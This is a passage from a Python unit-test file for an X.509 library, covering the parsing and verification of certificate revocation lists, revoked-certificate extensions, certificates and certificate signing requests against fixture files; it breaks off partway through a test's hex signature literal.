def test_verify_good(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "valid_signature.pem"),
x509.load_pem_x509_crl,
backend
)
crt = _load_cert(
os.path.join("x509", "custom", "valid_signature.pem"),
x509.load_pem_x509_certificate,
backend
)
assert crl.is_signature_valid(crt.public_key())
def test_verify_argument_must_be_a_public_key(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "valid_signature.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(TypeError):
crl.is_signature_valid("not a public key")
with pytest.raises(TypeError):
crl.is_signature_valid(object)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRevokedCertificate(object):
def test_revoked_basics(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
for i, rev in enumerate(crl):
assert isinstance(rev, x509.RevokedCertificate)
assert isinstance(rev.serial_number, int)
assert isinstance(rev.revocation_date, datetime.datetime)
assert isinstance(rev.extensions, x509.Extensions)
assert rev.serial_number == i
assert rev.revocation_date.isoformat() == "2015-01-01T00:00:00"
def test_revoked_extensions(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
exp_issuer = [
x509.DirectoryName(x509.Name([
x509.NameAttribute(x509.OID_COUNTRY_NAME, u"US"),
x509.NameAttribute(x509.OID_COMMON_NAME, u"cryptography.io"),
]))
]
# First revoked cert doesn't have extensions, test if it is handled
# correctly.
rev0 = crl[0]
# It should return an empty Extensions object.
assert isinstance(rev0.extensions, x509.Extensions)
assert len(rev0.extensions) == 0
with pytest.raises(x509.ExtensionNotFound):
rev0.extensions.get_extension_for_oid(x509.OID_CRL_REASON)
with pytest.raises(x509.ExtensionNotFound):
rev0.extensions.get_extension_for_oid(x509.OID_CERTIFICATE_ISSUER)
with pytest.raises(x509.ExtensionNotFound):
rev0.extensions.get_extension_for_oid(x509.OID_INVALIDITY_DATE)
# Test manual retrieval of extension values.
rev1 = crl[1]
assert isinstance(rev1.extensions, x509.Extensions)
reason = rev1.extensions.get_extension_for_class(
x509.CRLReason).value
assert reason == x509.CRLReason(x509.ReasonFlags.unspecified)
issuer = rev1.extensions.get_extension_for_class(
x509.CertificateIssuer).value
assert issuer == x509.CertificateIssuer(exp_issuer)
date = rev1.extensions.get_extension_for_class(
x509.InvalidityDate).value
assert date == x509.InvalidityDate(datetime.datetime(2015, 1, 1, 0, 0))
# Check if all reason flags can be found in the CRL.
flags = set(x509.ReasonFlags)
for rev in crl:
try:
r = rev.extensions.get_extension_for_class(x509.CRLReason)
except x509.ExtensionNotFound:
# Not all revoked certs have a reason extension.
pass
else:
flags.discard(r.value.reason)
assert len(flags) == 0
def test_no_revoked_certs(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_empty.pem"),
x509.load_pem_x509_crl,
backend
)
assert len(crl) == 0
def test_duplicate_entry_ext(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_dup_entry_ext.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(x509.DuplicateExtension):
crl[0].extensions
def test_unsupported_crit_entry_ext(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_md2_unknown_crit_entry_ext.pem"
),
x509.load_pem_x509_crl,
backend
)
ext = crl[0].extensions.get_extension_for_oid(
x509.ObjectIdentifier("1.2.3.4")
)
assert ext.value.value == b"\n\x01\x00"
def test_unsupported_reason(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_unsupported_reason.pem"
),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(ValueError):
crl[0].extensions
def test_invalid_cert_issuer_ext(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_inval_cert_issuer_entry_ext.pem"
),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(ValueError):
crl[0].extensions
def test_indexing(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(IndexError):
crl[-13]
with pytest.raises(IndexError):
crl[12]
assert crl[-1].serial_number == crl[11].serial_number
assert len(crl[2:4]) == 2
assert crl[2:4][0].serial_number == crl[2].serial_number
assert crl[2:4][1].serial_number == crl[3].serial_number
def test_get_revoked_certificate_doesnt_reorder(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
last_update = datetime.datetime(2002, 1, 1, 12, 1)
next_update = datetime.datetime(2030, 1, 1, 12, 1)
builder = x509.CertificateRevocationListBuilder().issuer_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"cryptography.io CA")
])
).last_update(
last_update
).next_update(
next_update
)
for i in [2, 500, 3, 49, 7, 1]:
revoked_cert = x509.RevokedCertificateBuilder().serial_number(
i
).revocation_date(
datetime.datetime(2012, 1, 1, 1, 1)
).build(backend)
builder = builder.add_revoked_certificate(revoked_cert)
crl = builder.sign(private_key, hashes.SHA256(), backend)
assert crl[0].serial_number == 2
assert crl[2].serial_number == 3
# make sure get_revoked_certificate_by_serial_number doesn't affect
# ordering after being invoked
crl.get_revoked_certificate_by_serial_number(500)
assert crl[0].serial_number == 2
assert crl[2].serial_number == 3
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSACertificate(object):
def test_load_pem_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 11559813051657483483
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"2b619ed04bfc9c3b08eb677d272192286a0947a8"
assert isinstance(cert.signature_hash_algorithm, hashes.SHA1)
assert (
cert.signature_algorithm_oid == SignatureAlgorithmOID.RSA_WITH_SHA1
)
def test_negative_serial_number(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "negative_serial.pem"),
x509.load_pem_x509_certificate,
backend,
)
assert cert.serial_number == -18008675309
def test_alternate_rsa_with_sha1_oid(self, backend):
cert = _load_cert(
os.path.join("x509", "alternate-rsa-sha1-oid.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA1)
assert (
cert.signature_algorithm_oid ==
SignatureAlgorithmOID._RSA_WITH_SHA1
)
def test_load_der_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 2
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
assert isinstance(cert.signature_hash_algorithm, hashes.SHA256)
def test_signature(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.signature == binascii.unhexlify(
b"8e0f72fcbebe4755abcaf76c8ce0bae17cde4db16291638e1b1ce04a93cdb4c"
b"44a3486070986c5a880c14fdf8497e7d289b2630ccb21d24a3d1aa1b2d87482"
b"07f3a1e16ccdf8daa8a7ea1a33d49774f513edf09270bd8e665b6300a10f003"
b"66a59076905eb63cf10a81a0ca78a6ef3127f6cb2f6fb7f947fce22a30d8004"
b"8c243ba2c1a54c425fe12310e8a737638f4920354d4cce25cbd9dea25e6a2fe"
b"0d8579a5c8d929b9275be221975479f3f75075bcacf09526523b5fd67f7683f"
b"3cda420fabb1e9e6fc26bc0649cf61bb051d6932fac37066bb16f55903dfe78"
b"53dc5e505e2a10fbba4f9e93a0d3b53b7fa34b05d7ba6eef869bfc34b8e514f"
b"d5419f75"
)
assert len(cert.signature) == cert.public_key().key_size // 8
def test_tbs_certificate_bytes(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.tbs_certificate_bytes == binascii.unhexlify(
b"308202d8a003020102020900a06cb4b955f7f4db300d06092a864886f70d010"
b"10505003058310b3009060355040613024155311330110603550408130a536f"
b"6d652d53746174653121301f060355040a1318496e7465726e6574205769646"
b"769747320507479204c74643111300f0603550403130848656c6c6f20434130"
b"1e170d3134313132363231343132305a170d3134313232363231343132305a3"
b"058310b3009060355040613024155311330110603550408130a536f6d652d53"
b"746174653121301f060355040a1318496e7465726e657420576964676974732"
b"0507479204c74643111300f0603550403130848656c6c6f2043413082012230"
b"0d06092a864886f70d01010105000382010f003082010a0282010100b03af70"
b"2059e27f1e2284b56bbb26c039153bf81f295b73a49132990645ede4d2da0a9"
b"13c42e7d38d3589a00d3940d194f6e6d877c2ef812da22a275e83d8be786467"
b"48b4e7f23d10e873fd72f57a13dec732fc56ab138b1bb308399bb412cd73921"
b"4ef714e1976e09603405e2556299a05522510ac4574db5e9cb2cf5f99e8f48c"
b"1696ab3ea2d6d2ddab7d4e1b317188b76a572977f6ece0a4ad396f0150e7d8b"
b"1a9986c0cb90527ec26ca56e2914c270d2a198b632fa8a2fda55079d3d39864"
b"b6fb96ddbe331cacb3cb8783a8494ccccd886a3525078847ca01ca5f803e892"
b"14403e8a4b5499539c0b86f7a0daa45b204a8e079d8a5b03db7ba1ba3d7011a"
b"70203010001a381bc3081b9301d0603551d0e04160414d8e89dc777e4472656"
b"f1864695a9f66b7b0400ae3081890603551d23048181307f8014d8e89dc777e"
b"4472656f1864695a9f66b7b0400aea15ca45a3058310b300906035504061302"
b"4155311330110603550408130a536f6d652d53746174653121301f060355040"
b"a1318496e7465726e6574205769646769747320507479204c74643111300f06"
b"03550403130848656c6c6f204341820900a06cb4b955f7f4db300c0603551d1"
b"3040530030101ff"
)
cert.public_key().verify(
cert.signature, cert.tbs_certificate_bytes,
padding.PKCS1v15(), cert.signature_hash_algorithm
)
def test_issuer(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Validpre2000UTCnotBeforeDateTest3EE.crt"
),
x509.load_der_x509_certificate,
backend
)
issuer = cert.issuer
assert isinstance(issuer, x509.Name)
assert list(issuer) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u'Test Certificates 2011'
),
x509.NameAttribute(NameOID.COMMON_NAME, u'Good CA')
]
assert issuer.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(NameOID.COMMON_NAME, u'Good CA')
]
def test_all_issuer_name_types(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom",
"all_supported_names.pem"
),
x509.load_pem_x509_certificate,
backend
)
issuer = cert.issuer
assert isinstance(issuer, x509.Name)
assert list(issuer) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'CA'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Illinois'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Chicago'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'Zero, LLC'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'One, LLC'),
x509.NameAttribute(NameOID.COMMON_NAME, u'common name 0'),
x509.NameAttribute(NameOID.COMMON_NAME, u'common name 1'),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'OU 0'),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'OU 1'),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'dnQualifier0'),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'dnQualifier1'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'123'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'456'),
x509.NameAttribute(NameOID.TITLE, u'Title 0'),
x509.NameAttribute(NameOID.TITLE, u'Title 1'),
x509.NameAttribute(NameOID.SURNAME, u'Surname 0'),
x509.NameAttribute(NameOID.SURNAME, u'Surname 1'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'Given Name 0'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'Given Name 1'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Incognito 0'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Incognito 1'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'Last Gen'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'Next Gen'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc0'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc1'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test0@test.local'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test1@test.local'),
]
def test_subject(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Validpre2000UTCnotBeforeDateTest3EE.crt"
),
x509.load_der_x509_certificate,
backend
)
subject = cert.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u'Test Certificates 2011'
),
x509.NameAttribute(
NameOID.COMMON_NAME,
u'Valid pre2000 UTC notBefore Date EE Certificate Test3'
)
]
assert subject.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(
NameOID.COMMON_NAME,
u'Valid pre2000 UTC notBefore Date EE Certificate Test3'
)
]
def test_unicode_name(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom",
"utf8_common_name.pem"
),
x509.load_pem_x509_certificate,
backend
)
assert cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(
NameOID.COMMON_NAME,
u'We heart UTF8!\u2122'
)
]
assert cert.issuer.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(
NameOID.COMMON_NAME,
u'We heart UTF8!\u2122'
)
]
def test_non_ascii_dns_name(self, backend):
cert = _load_cert(
os.path.join("x509", "utf8-dnsname.pem"),
x509.load_pem_x509_certificate,
backend
)
san = cert.extensions.get_extension_for_class(
x509.SubjectAlternativeName
).value
names = san.get_values_for_type(x509.DNSName)
assert names == [
u'partner.biztositas.hu', u'biztositas.hu', u'*.biztositas.hu',
u'biztos\xedt\xe1s.hu', u'*.biztos\xedt\xe1s.hu',
u'xn--biztosts-fza2j.hu', u'*.xn--biztosts-fza2j.hu'
]
def test_all_subject_name_types(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom",
"all_supported_names.pem"
),
x509.load_pem_x509_certificate,
backend
)
subject = cert.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'AU'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'DE'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'California'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'New York'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'San Francisco'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Ithaca'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'Org Zero, LLC'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'Org One, LLC'),
x509.NameAttribute(NameOID.COMMON_NAME, u'CN 0'),
x509.NameAttribute(NameOID.COMMON_NAME, u'CN 1'),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME, u'Engineering 0'
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME, u'Engineering 1'
),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'qualified0'),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'qualified1'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'789'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'012'),
x509.NameAttribute(NameOID.TITLE, u'Title IX'),
x509.NameAttribute(NameOID.TITLE, u'Title X'),
x509.NameAttribute(NameOID.SURNAME, u'Last 0'),
x509.NameAttribute(NameOID.SURNAME, u'Last 1'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'First 0'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'First 1'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Guy Incognito 0'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Guy Incognito 1'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'32X'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'Dreamcast'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc2'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc3'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test2@test.local'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test3@test.local'),
]
def test_load_good_ca_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.serial_number == 2
public_key = cert.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
assert cert.version is x509.Version.v3
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
def test_utc_pre_2000_not_before_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Validpre2000UTCnotBeforeDateTest3EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(1950, 1, 1, 12, 1)
def test_pre_2000_utc_not_after_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Invalidpre2000UTCEEnotAfterDateTest7EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_after == datetime.datetime(1999, 1, 1, 12, 1)
def test_post_2000_utc_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(
2014, 11, 26, 21, 41, 20
)
assert cert.not_valid_after == datetime.datetime(
2014, 12, 26, 21, 41, 20
)
def test_generalized_time_not_before_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotBeforeDateTest4EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(2002, 1, 1, 12, 1)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.version is x509.Version.v3
def test_generalized_time_not_after_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotAfterDateTest8EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2050, 1, 1, 12, 1)
assert cert.version is x509.Version.v3
def test_invalid_version_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "invalid_version.pem"),
x509.load_pem_x509_certificate,
backend
)
with pytest.raises(x509.InvalidVersion) as exc:
cert.version
assert exc.value.parsed_version == 7
def test_eq(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert2 = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert == cert2
def test_ne(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert2 = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotAfterDateTest8EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert != cert2
assert cert != object()
def test_hash(self, backend):
cert1 = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert2 = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert3 = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotAfterDateTest8EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert hash(cert1) == hash(cert2)
assert hash(cert1) != hash(cert3)
def test_version_1_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "v1_cert.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.version is x509.Version.v1
def test_invalid_pem(self, backend):
with pytest.raises(ValueError):
x509.load_pem_x509_certificate(b"notacert", backend)
def test_invalid_der(self, backend):
with pytest.raises(ValueError):
x509.load_der_x509_certificate(b"notacert", backend)
def test_unsupported_signature_hash_algorithm_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "verisign_md2_root.pem"),
x509.load_pem_x509_certificate,
backend
)
with pytest.raises(UnsupportedAlgorithm):
cert.signature_hash_algorithm
def test_public_bytes_pem(self, backend):
# Load an existing certificate.
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
# Encode it to PEM and load it back.
cert = x509.load_pem_x509_certificate(cert.public_bytes(
encoding=serialization.Encoding.PEM,
), backend)
# We should recover what we had to start with.
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.serial_number == 2
public_key = cert.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
assert cert.version is x509.Version.v3
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
def test_public_bytes_der(self, backend):
# Load an existing certificate.
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
# Encode it to DER and load it back.
cert = x509.load_der_x509_certificate(cert.public_bytes(
encoding=serialization.Encoding.DER,
), backend)
# We should recover what we had to start with.
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.serial_number == 2
public_key = cert.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
assert cert.version is x509.Version.v3
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
def test_public_bytes_invalid_encoding(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
with pytest.raises(TypeError):
cert.public_bytes('NotAnEncoding')
@pytest.mark.parametrize(
("cert_path", "loader_func", "encoding"),
[
(
os.path.join("x509", "v1_cert.pem"),
x509.load_pem_x509_certificate,
serialization.Encoding.PEM,
),
(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
serialization.Encoding.DER,
),
]
)
def test_public_bytes_match(self, cert_path, loader_func, encoding,
backend):
cert_bytes = load_vectors_from_file(
cert_path, lambda pemfile: pemfile.read(), mode="rb"
)
cert = loader_func(cert_bytes, backend)
serialized = cert.public_bytes(encoding)
assert serialized == cert_bytes
def test_certificate_repr(self, backend):
cert = _load_cert(
os.path.join(
"x509", "cryptography.io.pem"
),
x509.load_pem_x509_certificate,
backend
)
assert repr(cert) == (
"<Certificate(subject=<Name(OU=GT48742965,OU=See www.rapidssl.com"
"/resources/cps (c)14,OU=Domain Control Validated - RapidSSL(R),"
"CN=www.cryptography.io)>, ...)>"
)
def test_parse_tls_feature_extension(self, backend):
cert = _load_cert(
os.path.join("x509", "tls-feature-ocsp-staple.pem"),
x509.load_pem_x509_certificate,
backend
)
ext = cert.extensions.get_extension_for_class(x509.TLSFeature)
assert ext.critical is False
assert ext.value == x509.TLSFeature(
[x509.TLSFeatureType.status_request]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSACertificateRequest(object):
@pytest.mark.parametrize(
("path", "loader_func"),
[
[
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr
],
[
os.path.join("x509", "requests", "rsa_sha1.der"),
x509.load_der_x509_csr
],
]
)
def test_load_rsa_certificate_request(self, path, loader_func, backend):
request = _load_cert(path, loader_func, backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
assert (
request.signature_algorithm_oid ==
SignatureAlgorithmOID.RSA_WITH_SHA1
)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
]
extensions = request.extensions
assert isinstance(extensions, x509.Extensions)
assert list(extensions) == []
@pytest.mark.parametrize(
"loader_func",
[x509.load_pem_x509_csr, x509.load_der_x509_csr]
)
def test_invalid_certificate_request(self, loader_func, backend):
with pytest.raises(ValueError):
loader_func(b"notacsr", backend)
def test_unsupported_signature_hash_algorithm_request(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_md4.pem"),
x509.load_pem_x509_csr,
backend
)
with pytest.raises(UnsupportedAlgorithm):
request.signature_hash_algorithm
def test_duplicate_extension(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "two_basic_constraints.pem"
),
x509.load_pem_x509_csr,
backend
)
with pytest.raises(x509.DuplicateExtension) as exc:
request.extensions
assert exc.value.oid == ExtensionOID.BASIC_CONSTRAINTS
def test_unsupported_critical_extension(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "unsupported_extension_critical.pem"
),
x509.load_pem_x509_csr,
backend
)
ext = request.extensions.get_extension_for_oid(
x509.ObjectIdentifier('1.2.3.4')
)
assert ext.value.value == b"value"
def test_unsupported_extension(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "unsupported_extension.pem"
),
x509.load_pem_x509_csr,
backend
)
extensions = request.extensions
assert len(extensions) == 1
assert extensions[0].oid == x509.ObjectIdentifier("1.2.3.4")
assert extensions[0].value == x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"value"
)
def test_request_basic_constraints(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "basic_constraints.pem"
),
x509.load_pem_x509_csr,
backend
)
extensions = request.extensions
assert isinstance(extensions, x509.Extensions)
assert list(extensions) == [
x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
True,
x509.BasicConstraints(ca=True, path_length=1),
),
]
def test_subject_alt_name(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "san_rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend,
)
ext = request.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(ext.value) == [
x509.DNSName(u"cryptography.io"),
x509.DNSName(u"sub.cryptography.io"),
]
def test_public_bytes_pem(self, backend):
# Load an existing CSR.
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
# Encode it to PEM and load it back.
request = x509.load_pem_x509_csr(request.public_bytes(
encoding=serialization.Encoding.PEM,
), backend)
# We should recover what we had to start with.
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
]
def test_public_bytes_der(self, backend):
# Load an existing CSR.
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
# Encode it to DER and load it back.
request = x509.load_der_x509_csr(request.public_bytes(
encoding=serialization.Encoding.DER,
), backend)
# We should recover what we had to start with.
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
]
def test_signature(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.signature == binascii.unhexlify(
b"8364c86ffbbfe0bfc9a21f831256658ca8989741b80576d36f08a934603a43b1"
b"837246d00167a518abb1de7b51a1e5b7ebea14944800818b1a923c804f120a0d"
b"624f6310ef79e8612755c2b01dcc7f59dfdbce0db3f2630f185f504b8c17af80"
b"cbd364fa5fda68337153930948226cd4638287a0aed6524d3006885c19028a1e"
